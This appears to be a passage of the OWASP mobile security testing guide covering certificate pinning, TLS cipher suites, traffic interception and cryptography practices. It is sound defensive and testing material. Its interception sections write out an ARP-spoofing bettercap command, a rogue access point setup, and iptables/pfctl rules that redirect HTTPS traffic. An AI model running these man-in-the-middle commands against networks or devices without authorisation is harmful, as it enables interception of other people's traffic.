Whenever the app connects to a server whose certificate is self-signed or unknown to the system, the secure connection will fail. This is typically the case for any non public CAs, for instance those issued by an organization such as a government, corporation, or education institution for their own use.
Both Android and iOS offer means to extend trust, i.e. include additional CAs so that the app trusts the system's built-in ones plus the custom ones.
However, remember that the device users are always able to include additional CAs. Therefore, depending on the threat model of the app it might be necessary to avoid trusting any certificates added to the user trust store or even go further and only trust a pre-defined specific certificate or set of certificates.
For many apps, the \"default behavior\" provided by the mobile platform will be secure enough for their use case (in the rare case that a system-trusted CA is compromised the data handled by the app is not considered sensitive or other security measures are taken which are resilient even to such a CA breach). However, for other apps such as financial or health apps, the risk of a CA breach, even if rare, must be considered.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#restricting-trust-identity-pinning","title":"Restricting Trust: Identity Pinning","text":"Some apps might need to further increase their security by restricting the number of CAs that they trust. Typically only the CAs which are used by the developer are explicitly trusted, while disregarding all others. This trust restriction is known as Identity Pinning usually implemented as Certificate Pinning or Public Key Pinning.
In the OWASP MASTG we will be referring to this term as \"Identity Pinning\", \"Certificate Pinning\", \"Public Key Pinning\" or simply \"Pinning\".
Pinning is the process of associating a remote endpoint with a particular identity, such as a X.509 certificate or public key, instead of accepting any certificate signed by a trusted CA. After pinning the server identity (or a certain set, aka. pinset), the mobile app will subsequently connect to those remote endpoints only if the identity matches. Withdrawing trust from unnecessary CAs reduces the app's attack surface.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#general-guidelines","title":"General Guidelines","text":"The OWASP Certificate Pinning Cheat Sheet gives essential guidance on:
Both Android and iOS recommendations match the \"best case\" which is:
subjectPublicKeyInfo
.Pinning has gained a bad reputation since its introduction several years ago. We'd like to clarify a couple of points that are valid at least for mobile application security:
The Android Developers site includes the following warning:
Caution: Certificate Pinning is not recommended for Android applications due to the high risk of future server configuration changes, such as changing to another Certificate Authority, rendering the application unable to connect to the server without receiving a client software update.
They also include this note:
Note that, when using certificate pinning, you should always include a backup key so that if you are forced to switch to new keys or change CAs (when pinning to a CA certificate or an intermediate of that CA), your app's connectivity is unaffected. Otherwise, you must push out an update to the app to restore connectivity.
The first statement can be mistakenly interpreted as saying that they \"do not recommend certificate pinning\". The second statement clarifies this: the actual recommendation is that if developers want to implement pinning they have to take the necessary precautions.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#about-pinning-recommendations-in-apple-developers","title":"About Pinning Recommendations in Apple Developers","text":"Apple recommends thinking long-term and creating a proper server authentication strategy.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#owasp-mastg-recommendation","title":"OWASP MASTG Recommendation","text":"Pinning is a recommended practice, especially for MASVS-L2 apps. However, developers must implement it exclusively for the endpoints under their control and be sure to include backup keys (aka. backup pins) and have a proper app update strategy.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#learn-more","title":"Learn more","text":"One of the core mobile app functions is sending/receiving data over untrusted networks like the Internet. If the data is not properly protected in transit, an attacker with access to any part of the network infrastructure (e.g., a Wi-Fi access point) may intercept, read, or modify it. This is why plaintext network protocols are rarely advisable.
The vast majority of apps rely on HTTP for communication with the backend. HTTPS wraps HTTP in an encrypted connection (the acronym HTTPS originally referred to HTTP over Secure Socket Layer (SSL); SSL is the deprecated predecessor of TLS). TLS allows authentication of the backend service and ensures confidentiality and integrity of the network data.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#recommended-tls-settings","title":"Recommended TLS Settings","text":"Ensuring proper TLS configuration on the server side is also important. The SSL protocol is deprecated and should no longer be used. Also TLS v1.0 and TLS v1.1 have known vulnerabilities and their usage is deprecated in all major browsers by 2020. TLS v1.2 and TLS v1.3 are considered best practice for secure transmission of data. Starting with Android 10 (API level 29), TLS v1.3 will be enabled by default for faster and more secure communication. The major change with TLS v1.3 is that customizing cipher suites is no longer possible and that all of them are enabled when TLS v1.3 is enabled, whereas Zero Round Trip (0-RTT) mode isn't supported.
When both the client and server are controlled by the same organization and used only for communicating with one another, you can increase security by hardening the configuration.
If a mobile application connects to a specific server, its networking stack can be tuned to ensure the highest possible security level for the server's configuration. Lack of support in the underlying operating system may force the mobile application to use a weaker configuration.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#cipher-suites-terminology","title":"Cipher Suites Terminology","text":"Cipher suites have the following structure:
Protocol_KeyExchangeAlgorithm_WITH_BlockCipher_IntegrityCheckAlgorithm\n
This structure includes:
Example: TLS_RSA_WITH_3DES_EDE_CBC_SHA
In the example above the cipher suites uses:
Note that in TLSv1.3 the Key Exchange Algorithm is not part of the cipher suite, instead it is determined during the TLS handshake.
In the following listing, we\u2019ll present the different algorithms of each part of the cipher suite.
Protocols:
SSLv1
SSLv2
- RFC 6176SSLv3
- RFC 6101TLSv1.0
- RFC 2246TLSv1.1
- RFC 4346TLSv1.2
- RFC 5246TLSv1.3
- RFC 8446Key Exchange Algorithms:
DSA
- RFC 6979ECDSA
- RFC 6979RSA
- RFC 8017DHE
- RFC 2631 - RFC 7919ECDHE
- RFC 4492PSK
- RFC 4279DSS
- FIPS186-4DH_anon
- RFC 2631 - RFC 7919DHE_RSA
- RFC 2631 - RFC 7919DHE_DSS
- RFC 2631 - RFC 7919ECDHE_ECDSA
- RFC 8422ECDHE_PSK
- RFC 8422 - RFC 5489ECDHE_RSA
- RFC 8422Block Ciphers:
DES
- RFC 4772DES_CBC
- RFC 18293DES
- RFC 24203DES_EDE_CBC
- RFC 2420AES_128_CBC
- RFC 3268AES_128_GCM
- RFC 5288AES_256_CBC
- RFC 3268AES_256_GCM
- RFC 5288RC4_40
- RFC 7465RC4_128
- RFC 7465CHACHA20_POLY1305
- RFC 7905 - RFC 7539Integrity Check Algorithms:
MD5
- RFC 6151SHA
- RFC 6234SHA256
- RFC 6234SHA384
- RFC 6234Note that the efficiency of a cipher suite depends on the efficiency of its algorithms.
The following resources contain the latest recommended cipher suites to use with TLS:
Some Android and iOS versions do not support some of the recommended cipher suites, so for compatibility purposes you can check the supported cipher suites for Android and iOS versions and choose the top supported cipher suites.
If you want to verify whether your server supports the right cipher suites, there are various tools you can use:
Finally, verify that the server or termination proxy at which the HTTPS connection terminates is configured according to best practices. See also the OWASP Transport Layer Protection cheat sheet and the Qualys SSL/TLS Deployment Best Practices.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#intercepting-https-traffic","title":"Intercepting HTTP(S) Traffic","text":"In many cases, it is most practical to configure a system proxy on the mobile device, so that HTTP(S) traffic is redirected through an interception proxy running on your host computer. By monitoring the requests between the mobile app client and the backend, you can easily map the available server-side APIs and gain insight into the communication protocol. Additionally, you can replay and manipulate requests to test for server-side vulnerabilities.
Several free and commercial proxy tools are available. Here are some of the most popular:
To use the interception proxy, you'll need to run it on your host computer and configure the mobile app to route HTTP(S) requests to your proxy. In most cases, it is enough to set a system-wide proxy in the network settings of the mobile device - if the app uses standard HTTP APIs or popular libraries such as okhttp
, it will automatically use the system settings.
Using a proxy breaks SSL certificate verification and the app will usually fail to initiate TLS connections. To work around this issue, you can install your proxy's CA certificate on the device. We'll explain how to do this in the OS-specific \"Basic Security Testing\" chapters.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#intercepting-non-http-traffic","title":"Intercepting Non-HTTP Traffic","text":"Interception proxies such as Burp and OWASP ZAP won't show non-HTTP traffic, because they aren't capable of decoding it properly by default. There are, however, Burp plugins available such as:
These plugins can visualize non-HTTP protocols and you will also be able to intercept and manipulate the traffic.
Note that this setup can sometimes become very tedious and is not as straightforward as testing HTTP.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#intercepting-traffic-from-the-app-process","title":"Intercepting Traffic from the App Process","text":"Depending on your goal while testing the app, sometimes it is enough to monitor the traffic before it reaches the network layer or when the responses are received in the app.
You don't need to deploy a fully fledged MITM attack if you simply want to know if a certain piece of sensitive data is being transmitted to the network. In this case you wouldn't even have to bypass pinning, if implemented. You just have to hook the right functions, e.g. SSL_write
and SSL_read
from openssl.
This would work pretty well for apps using standard API libraries functions and classes, however there might be some downsides:
See some examples:
This technique is also useful for other types of traffic such as BLE, NFC, etc. where deploying a MITM attack might be very costly and or complex.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#intercepting-traffic-on-the-network-layer","title":"Intercepting Traffic on the Network Layer","text":"Dynamic analysis by using an interception proxy can be straightforward if standard libraries are used in the app and all communication is done via HTTP. But there are several cases where this does not work:
In these cases you need to monitor and analyze the network traffic first in order to decide what to do next. Luckily, there are several options for redirecting and intercepting network communication:
To be able to get a man-in-the-middle position your host computer should be in the same wireless network as the mobile phone and the gateway it communicates to. Once this is done you need the IP address of your mobile phone. For a full dynamic analysis of a mobile app, all network traffic should be intercepted.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#mitm-attack","title":"MITM Attack","text":"Start your preferred network analyzer tool first, then start bettercap with the following command and replace the IP address below (X.X.X.X) with the target you want to execute the MITM attack against.
$ sudo bettercap -eval \"set arp.spoof.targets X.X.X.X; arp.spoof on; set arp.spoof.internal true; set arp.spoof.fullduplex true;\"\nbettercap v2.22 (built for darwin amd64 with go1.12.1) [type 'help' for a list of commands]\n\n[19:21:39] [sys.log] [inf] arp.spoof enabling forwarding\n[19:21:39] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets.\n
bettercap will then automatically send the packets to the network gateway in the (wireless) network and you are able to sniff the traffic. Beginning of 2019 support for full duplex ARP spoofing was added to bettercap.
On the mobile phone start the browser and navigate to http://example.com
, you should see output like the following when you are using Wireshark.
If that's the case, you are now able to see the complete network traffic that is sent and received by the mobile phone. This includes also DNS, DHCP and any other form of communication and can therefore be quite \"noisy\". You should therefore know how to use DisplayFilters in Wireshark or know how to filter in tcpdump to focus only on the relevant traffic for you.
Man-in-the-middle attacks work against any device and operating system as the attack is executed on OSI Layer 2 through ARP Spoofing. When you are MITM you might not be able to see clear text data, as the data in transit might be encrypted by using TLS, but it will give you valuable information about the hosts involved, the protocols used and the ports the app is communicating with.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#simulating-a-man-in-the-middle-attack-with-an-access-point","title":"Simulating a Man-in-the-Middle Attack with an access point","text":""},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#network-setup_1","title":"Network Setup","text":"A simple way to simulate a man-in-the-middle (MITM) attack is to configure a network where all packets between the devices in scope and the target network are going through your host computer. In a mobile penetration test, this can be achieved by using an access point the mobile devices and your host computer are connected to. Your host computer is then becoming a router and an access point.
Following scenarios are possible:
The scenario with an external USB WiFi card requires that the card has the capability to create an access point. Additionally, you need to install some tools and/or configure the network to enforce a man-in-the-middle position (see below). You can verify if your WiFi card has AP capabilities by using the command iw
on Kali Linux:
iw list | grep AP\n
The scenario with a separate access point requires access to the configuration of the AP and you should check first if the AP supports either:
In both cases the AP needs to be configured to point to your host computer's IP. Your host computer must be connected to the AP (via wired connection or WiFi) and you need to have connection to the target network (can be the same connection as to the AP). Some additional configuration may be required on your host computer to route traffic to the target network.
If the separate access point belongs to the customer, all changes and configurations should be clarified prior to the engagement and a backup should be created, before making any changes.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#installation","title":"Installation","text":"The following procedure is setting up a man-in-the-middle position using an access point and an additional network interface:
Create a WiFi network either through a separate access point or through an external USB WiFi card or through the built-in card of your host computer.
This can be done by using the built-in utilities on macOS. You can share the internet connection on Mac with other network users.
For all major Linux and Unix operating systems you need tools such as:
For Kali Linux you can install these tools with apt-get
:
apt-get update\napt-get install hostapd dnsmasq aircrack-ng\n
iptables and wpa_supplicant are installed by default on Kali Linux.
In case of a separate access point, route the traffic to your host computer. In case of an external USB WiFi card or built-in WiFi card the traffic is already available on your host computer.
Route the incoming traffic coming from the WiFi to the additional network interface where the traffic can reach the target network. Additional network interface can be wired connection or other WiFi card, depending on your setup.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#configuration","title":"Configuration","text":"We focus on the configuration files for Kali Linux. Following values need to be defined:
The following configuration files need to be changed and adjusted accordingly:
hostapd.conf
# Name of the WiFi interface we use\ninterface=wlan1\n# Use the nl80211 driver\ndriver=nl80211\nhw_mode=g\nchannel=6\nwmm_enabled=1\nmacaddr_acl=0\nauth_algs=1\nignore_broadcast_ssid=0\nwpa=2\nwpa_key_mgmt=WPA-PSK\nrsn_pairwise=CCMP\n# Name of the AP network\nssid=STM-AP\n# Password of the AP network\nwpa_passphrase=password\n
wpa_supplicant.conf
network={\n ssid=\"NAME_OF_THE_TARGET_NETWORK\"\n psk=\"PASSWORD_OF_THE_TARGET_NETWORK\"\n}\n
dnsmasq.conf
interface=wlan1\ndhcp-range=10.0.0.10,10.0.0.250,12h\ndhcp-option=3,10.0.0.1\ndhcp-option=6,10.0.0.1\nserver=8.8.8.8\nlog-queries\nlog-dhcp\nlisten-address=127.0.0.1\n
To be able to get a man-in-the-middle position you need to run the above configuration. This can be done by using the following commands on Kali Linux:
# check if other process is not using WiFi interfaces\n$ airmon-ng check kill\n# configure IP address of the AP network interface\n$ ifconfig wlan1 10.0.0.1 up\n# start access point\n$ hostapd hostapd.conf\n# connect the target network interface\n$ wpa_supplicant -B -i wlan0 -c wpa_supplicant.conf\n# run DNS server\n$ dnsmasq -C dnsmasq.conf -d\n# enable routing\n$ echo 1 > /proc/sys/net/ipv4/ip_forward\n# iptables will NAT connections from AP network interface to the target network interface\n$ iptables --flush\n$ iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE\n$ iptables --append FORWARD --in-interface wlan1 -j ACCEPT\n$ iptables -t nat -A POSTROUTING -j MASQUERADE\n
Now you can connect your mobile devices to the access point.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#network-analyzer-tool","title":"Network Analyzer Tool","text":"Install a tool that allows you to monitor and analyze the network traffic that will be redirected to your host computer. The two most common network monitoring (or capturing) tools are:
Wireshark offers a GUI and is more straightforward if you are not used to the command line. If you are looking for a command line tool you should either use TShark or tcpdump. All of these tools are available for all major Linux and Unix operating systems and should be part of their respective package installation mechanisms.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#setting-a-proxy-through-runtime-instrumentation","title":"Setting a Proxy Through Runtime Instrumentation","text":"On a rooted or jailbroken device, you can also use runtime hooking to set a new proxy or redirect network traffic. This can be achieved with hooking tools like Inspeckage or code injection frameworks like Frida and cycript. You'll find more information about runtime instrumentation in the \"Reverse Engineering and Tampering\" chapters of this guide.
"},{"location":"MASTG/General/0x04f-Testing-Network-Communication/#example-dealing-with-xamarin","title":"Example - Dealing with Xamarin","text":"As an example, we will now redirect all requests from a Xamarin app to an interception proxy.
Xamarin is a mobile application development platform that is capable of producing native Android and iOS apps by using Visual Studio and C# as programming language.
When testing a Xamarin app and when you are trying to set the system proxy in the Wi-Fi settings you won't be able to see any HTTP requests in your interception proxy, as the apps created by Xamarin do not use the local proxy settings of your phone. There are three ways to resolve this:
1st way: Add a default proxy to the app, by adding the following code in the OnCreate
or Main
method and re-create the app:
WebRequest.DefaultWebProxy = new WebProxy(\"192.168.11.1\", 8080);\n
2nd way: Use bettercap in order to get a man-in-the-middle position (MITM), see the section above about how to setup a MITM attack. When being MITM you only need to redirect port 443 to your interception proxy running on localhost. This can be done by using the command rdr
on macOS:
$ echo \"\nrdr pass inet proto tcp from any to any port 443 -> 127.0.0.1 port 8080\n\" | sudo pfctl -ef -\n
For Linux systems you can use iptables
:
sudo iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 127.0.0.1:8080\n
As last step, you need to set the option 'Support invisible proxy' in the listener settings of Burp Suite.
3rd way: Instead of bettercap an alternative is tweaking the /etc/hosts
on the mobile phone. Add an entry into /etc/hosts
for the target domain and point it to the IP address of your intercepting proxy. This creates a similar situation of being MITM as with bettercap and you need to redirect port 443 to the port which is used by your interception proxy. The redirection can be applied as mentioned above. Additionally, you need to redirect traffic from your interception proxy to the original location and port.
When redirecting traffic you should create narrow rules to the domains and IPs in scope, to minimize noise and out-of-scope traffic.
The interception proxy needs to listen to the port specified in the port forwarding rule above, which is 8080.
When a Xamarin app is configured to use a proxy (e.g. by using WebRequest.DefaultWebProxy
) you need to specify where traffic should go next, after redirecting the traffic to your intercepting proxy. You need to redirect the traffic to the original location. The following procedure is setting up a redirection in Burp to the original location:
Go to Request handling tab and set:
If not already done, install the CA certificates in your mobile device which will allow us to intercept HTTPS requests:
Start using the app and trigger its functions. You should see HTTP messages showing up in your interception proxy.
When using bettercap you need to activate \"Support invisible proxying\" in Proxy Tab / Options / Edit Interface
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/","title":"Mobile App Cryptography","text":"Cryptography plays an especially important role in securing the user's data - even more so in a mobile environment, where attackers having physical access to the user's device is a likely scenario. This chapter provides an outline of cryptographic concepts and best practices relevant to mobile apps. These best practices are valid independent of the mobile operating system.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#key-concepts","title":"Key Concepts","text":"The goal of cryptography is to provide constant confidentiality, data integrity, and authenticity, even in the face of an attack. Confidentiality involves ensuring data privacy through the use of encryption. Data integrity deals with data consistency and detection of tampering and modification of data through the use of hashing. Authenticity ensures that the data comes from a trusted source.
Encryption algorithms convert plaintext data into cipher text that conceals the original content. Plaintext data can be restored from the cipher text through decryption. Encryption can be symmetric (encryption/decryption with the same secret key) or asymmetric (encryption/decryption using a public and private key pair). In general, encryption operations do not protect integrity, but some symmetric encryption modes also feature that protection.
Symmetric-key encryption algorithms use the same key for both encryption and decryption. This type of encryption is fast and suitable for bulk data processing. Since everybody who has access to the key is able to decrypt the encrypted content, this method requires careful key management and centralized control over key distribution.
Public-key encryption algorithms operate with two separate keys: the public key and the private key. The public key can be distributed freely while the private key shouldn't be shared with anyone. A message encrypted with the public key can only be decrypted with the private key and vice-versa. Since asymmetric encryption is several times slower than symmetric operations, it's typically only used to encrypt small amounts of data, such as symmetric keys for bulk encryption.
Hashing isn't a form of encryption, but it does use cryptography. Hash functions deterministically map arbitrary pieces of data into fixed-length values. It's easy to compute the hash from the input, but very difficult (i.e. infeasible) to determine the original input from the hash. Additionally, the hash will completely change when even a single bit of the input changes. Hash functions are used for integrity verification, but don't provide an authenticity guarantee.
Message Authentication Codes (MACs) combine other cryptographic mechanisms (such as symmetric encryption or hashes) with secret keys to provide both integrity and authenticity protection. However, in order to verify a MAC, multiple entities have to share the same secret key and any of those entities can generate a valid MAC. HMACs, the most commonly used type of MAC, rely on hashing as the underlying cryptographic primitive. The full name of an HMAC algorithm usually includes the underlying hash function's type (for example, HMAC-SHA256 uses the SHA-256 hash function).
Signatures combine asymmetric cryptography (that is, using a public/private key pair) with hashing to provide integrity and authenticity by encrypting the hash of the message with the private key. However, unlike MACs, signatures also provide non-repudiation property as the private key should remain unique to the data signer.
Key Derivation Functions (KDFs) derive secret keys from a secret value (such as a password) and are used to turn keys into other formats or to increase their length. KDFs are similar to hashing functions but have other uses as well (for example, they are used as components of multi-party key-agreement protocols). While both hashing functions and KDFs must be difficult to reverse, KDFs have the added requirement that the keys they produce must have a level of randomness.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#identifying-insecure-andor-deprecated-cryptographic-algorithms","title":"Identifying Insecure and/or Deprecated Cryptographic Algorithms","text":"When assessing a mobile app, you should make sure that it does not use cryptographic algorithms and protocols that have significant known weaknesses or are otherwise insufficient for modern security requirements. Algorithms that were considered secure in the past may become insecure over time; therefore, it's important to periodically check current best practices and adjust configurations accordingly.
Verify that cryptographic algorithms are up to date and in-line with industry standards. Vulnerable algorithms include outdated block ciphers (such as DES and 3DES), stream ciphers (such as RC4), hash functions (such as MD5 and SHA1), and broken random number generators (such as Dual_EC_DRBG and SHA1PRNG). Note that even algorithms that are certified (for example, by NIST) can become insecure over time. A certification does not replace periodic verification of an algorithm's soundness. Algorithms with known weaknesses should be replaced with more secure alternatives. Additionally, algorithms used for encryption must be standardized and open to verification. Encrypting data using any unknown, or proprietary algorithms may expose the application to different cryptographic attacks which may result in recovery of the plaintext.
Inspect the app's source code to identify instances of cryptographic algorithms that are known to be weak, such as:
The names of cryptographic APIs depend on the particular mobile platform.
Please make sure that:
The following algorithms are recommended:
Additionally, you should always rely on secure hardware (if available) for storing encryption keys, performing cryptographic operations, etc.
For more information on algorithm choice and best practices, see the following resources:
Even the most secure encryption algorithm becomes vulnerable to brute-force attacks when that algorithm uses an insufficient key size.
Ensure that the key length fulfills accepted industry standards.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#symmetric-encryption-with-hard-coded-cryptographic-keys","title":"Symmetric Encryption with Hard-Coded Cryptographic Keys","text":"The security of symmetric encryption and keyed hashes (MACs) depends on the secrecy of the key. If the key is disclosed, the security gained by encryption is lost. To prevent this, never store secret keys in the same place as the encrypted data they helped create. A common mistake is encrypting locally stored data with a static, hardcoded encryption key and compiling that key into the app. This makes the key accessible to anyone who can use a disassembler.
Hardcoded encryption key means that a key is:
First, ensure that no keys or passwords are stored within the source code. This means you should check native code, JavaScript/Dart code, Java/Kotlin code on Android and Objective-C/Swift in iOS. Note that hard-coded keys are problematic even if the source code is obfuscated since obfuscation is easily bypassed by dynamic instrumentation.
If the app is using two-way TLS (both server and client certificates are validated), make sure that:
If the app relies on an additional encrypted container stored in app data, check how the encryption key is used. If a key-wrapping scheme is used, ensure that the master secret is initialized for each user or the container is re-encrypted with new key. If you can use the master secret or previous password to decrypt the container, check how password changes are handled.
Secret keys must be stored in secure device storage whenever symmetric cryptography is used in mobile apps. For more information on the platform-specific APIs, see the \"Data Storage on Android\" and \"Data Storage on iOS\" chapters.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#weak-key-generation-functions","title":"Weak Key Generation Functions","text":"Cryptographic algorithms (such as symmetric encryption or some MACs) expect a secret input of a given size. For example, AES uses a key of exactly 16 bytes. A native implementation might use the user-supplied password directly as an input key. Using a user-supplied password as an input key has the following problems:
Ensure that passwords aren't directly passed into an encryption function. Instead, the user-supplied password should be passed into a KDF to create a cryptographic key. Choose an appropriate iteration count when using password derivation functions. For example, NIST recommends an iteration count of at least 10,000 for PBKDF2 and for critical keys where user-perceived performance is not critical at least 10,000,000. For critical keys, it is recommended to consider implementation of algorithms recognized by Password Hashing Competition (PHC) like Argon2.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#weak-random-number-generators","title":"Weak Random Number Generators","text":"It is fundamentally impossible to produce truly random numbers on any deterministic device. Pseudo-random number generators (RNG) compensate for this by producing a stream of pseudo-random numbers - a stream of numbers that appear as if they were randomly generated. The quality of the generated numbers varies with the type of algorithm used. Cryptographically secure RNGs generate random numbers that pass statistical randomness tests, and are resilient against prediction attacks (e.g. it is statistically infeasible to predict the next number produced).
Mobile SDKs offer standard implementations of RNG algorithms that produce numbers with sufficient artificial randomness. We'll introduce the available APIs in the Android and iOS specific sections.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#custom-implementations-of-cryptography","title":"Custom Implementations of Cryptography","text":"Inventing proprietary cryptographic functions is time consuming, difficult, and likely to fail. Instead, we can use well-known algorithms that are widely regarded as secure. Mobile operating systems offer standard cryptographic APIs that implement those algorithms.
Carefully inspect all the cryptographic methods used within the source code, especially those that are directly applied to sensitive data. All cryptographic operations should use standard cryptographic APIs for Android and iOS (we'll write about those in more detail in the platform-specific chapters). Any cryptographic operations that don't invoke standard routines from known providers should be closely inspected. Pay close attention to standard algorithms that have been modified. Remember that encoding isn't the same as encryption! Always investigate further when you find bit manipulation operators like XOR (exclusive OR).
At all implementations of cryptography, you need to ensure that the following always takes place:
Advanced Encryption Standard (AES) is the widely accepted standard for symmetric encryption in mobile apps. It's an iterative block cipher that is based on a series of linked mathematical operations. AES performs a variable number of rounds on the input, each of which involve substitution and permutation of the bytes in the input block. Each round uses a 128-bit round key which is derived from the original AES key.
As of this writing, no efficient cryptanalytic attacks against AES have been discovered. However, implementation details and configurable parameters such as the block cipher mode leave some margin for error.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#weak-block-cipher-mode","title":"Weak Block Cipher Mode","text":"Block-based encryption is performed upon discrete input blocks (for example, AES has 128-bit blocks). If the plaintext is larger than the block size, the plaintext is internally split up into blocks of the given input size and encryption is performed on each block. A block cipher mode of operation (or block mode) determines if the result of encrypting the previous block impacts subsequent blocks.
ECB (Electronic Codebook) divides the input into fixed-size blocks that are encrypted separately using the same key. If multiple divided blocks contain the same plaintext, they will be encrypted into identical ciphertext blocks which makes patterns in data easier to identify. In some situations, an attacker might also be able to replay the encrypted data.
Verify that Cipher Block Chaining (CBC) mode is used instead of ECB. In CBC mode, plaintext blocks are XORed with the previous ciphertext block. This ensures that each encrypted block is unique and randomized even if blocks contain the same information. Please note that it is best to combine CBC with an HMAC and/or ensure that no errors are given such as \"Padding error\", \"MAC error\", \"decryption failed\" in order to be more resistant to a padding oracle attack.
When storing encrypted data, we recommend using a block mode that also protects the integrity of the stored data, such as Galois/Counter Mode (GCM). The latter has the additional benefit that the algorithm is mandatory for each TLSv1.2 implementation, and thus is available on all modern platforms.
For more information on effective block modes, see the NIST guidelines on block mode selection.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#predictable-initialization-vector","title":"Predictable Initialization Vector","text":"CBC, OFB, CFB, PCBC, GCM mode require an initialization vector (IV) as an initial input to the cipher. The IV doesn't have to be kept secret, but it shouldn't be predictable: it should be random and unique/non-repeatable for each encrypted message. Make sure that IVs are generated using a cryptographically secure random number generator. For more information on IVs, see Crypto Fail's initialization vectors article.
Pay attention to cryptographic libraries used in the code: many open source libraries provide examples in their documentations that might follow bad practices (e.g. using a hardcoded IV). A popular mistake is copy-pasting example code without changing the IV value.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#initialization-vectors-in-stateful-operation-modes","title":"Initialization Vectors in stateful operation modes","text":"Please note that the usage of IVs is different when using CTR and GCM mode in which the initialization vector is often a counter (in CTR combined with a nonce). So here using a predictable IV with its own stateful model is exactly what is needed. In CTR you have a new nonce plus counter as an input to every new block operation. For example: for a 5120 bit long plaintext: you have 20 blocks, so you need 20 input vectors consisting of a nonce and counter. Whereas in GCM you have a single IV per cryptographic operation, which should not be repeated with the same key. See section 8 of the documentation from NIST on GCM for more details and recommendations of the IV.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#padding-oracle-attacks-due-to-weaker-padding-or-block-operation-implementations","title":"Padding Oracle Attacks due to Weaker Padding or Block Operation Implementations","text":"In the old days, PKCS1.5 padding (in code: PKCS1Padding
) was used as a padding mechanism when doing asymmetric encryption. This mechanism is vulnerable to the padding oracle attack. Therefore, it is best to use OAEP (Optimal Asymmetric Encryption Padding) captured in PKCS#1 v2.0 (in code: OAEPPadding
, OAEPwithSHA-256andMGF1Padding
, OAEPwithSHA-224andMGF1Padding
, OAEPwithSHA-384andMGF1Padding
, OAEPwithSHA-512andMGF1Padding
). Note that, even when using OAEP, you can still run into an issue known best as the Manger's attack as described in the blog at Kudelskisecurity.
Note: AES-CBC with PKCS #5 has shown to be vulnerable to padding oracle attacks as well, given that the implementation gives warnings, such as \"Padding error\", \"MAC error\", or \"decryption failed\". See The Padding Oracle Attack and The CBC Padding Oracle Problem for an example. Next, it is best to ensure that you add an HMAC after you encrypt the plaintext: after all a ciphertext with a failing MAC will not have to be decrypted and can be discarded.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#protecting-keys-in-storage-and-in-memory","title":"Protecting Keys in Storage and in Memory","text":"When memory dumping is part of your threat model, then keys can be accessed the moment they are actively used. Memory dumping either requires root-access (e.g. a rooted device or jailbroken device) or it requires a patched application with Frida (so you can use tools like Fridump). Therefore it is best to consider the following, if keys are still needed at the device:
Note: given the ease of memory dumping, never share the same key among accounts and/or devices, other than public keys used for signature verification or encryption.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#protecting-keys-in-transport","title":"Protecting Keys in Transport","text":"When keys need to be transported from one device to another, or from the app to a backend, make sure that proper key protection is in place, by means of a transport keypair or another mechanism. Often, keys are shared with obfuscation methods which can be easily reversed. Instead, make sure asymmetric cryptography or wrapping keys are used. For example, a symmetric key can be encrypted with the public key from an asymmetric key pair.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#cryptographic-apis-on-android-and-ios","title":"Cryptographic APIs on Android and iOS","text":"While same basic cryptographic principles apply independent of the particular OS, each operating system offers its own implementation and APIs. Platform-specific cryptographic APIs for data storage are covered in greater detail in the \"Data Storage on Android\" and \"Testing Data Storage on iOS\" chapters. Encryption of network traffic, especially Transport Layer Security (TLS), is covered in the \"Android Network APIs\" chapter.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#cryptographic-policy","title":"Cryptographic Policy","text":"In larger organizations, or when high-risk applications are created, it can often be a good practice to have a cryptographic policy, based on frameworks such as NIST Recommendation for Key Management. When basic errors are found in the application of cryptography, it can be a good starting point of setting up a lessons learned / cryptographic key management policy.
"},{"location":"MASTG/General/0x04g-Testing-Cryptography/#cryptography-regulations","title":"Cryptography Regulations","text":"When you upload the app to the App Store or Google Play, your application is typically stored on a US server. If your app contains cryptography and is distributed to any other country, it is considered a cryptography export. It means that you need to follow US export regulations for cryptography. Also, some countries have import regulations for cryptography.
Learn more:
Mobile app developers use a wide variety of programming languages and frameworks. As such, common vulnerabilities such as SQL injection, buffer overflows, and cross-site scripting (XSS), may manifest in apps when neglecting secure programming practices.
The same programming flaws may affect both Android and iOS apps to some degree, so we'll provide an overview of the most common vulnerability classes in this general section of the guide. In later sections, we will cover OS-specific instances and exploit mitigation features.
"},{"location":"MASTG/General/0x04h-Testing-Code-Quality/#injection-flaws","title":"Injection Flaws","text":"An injection flaw describes a class of security vulnerability occurring when user input is inserted into backend queries or commands. By injecting meta-characters, an attacker can execute malicious code that is inadvertently interpreted as part of the command or query. For example, by manipulating a SQL query, an attacker could retrieve arbitrary database records or manipulate the content of the backend database.
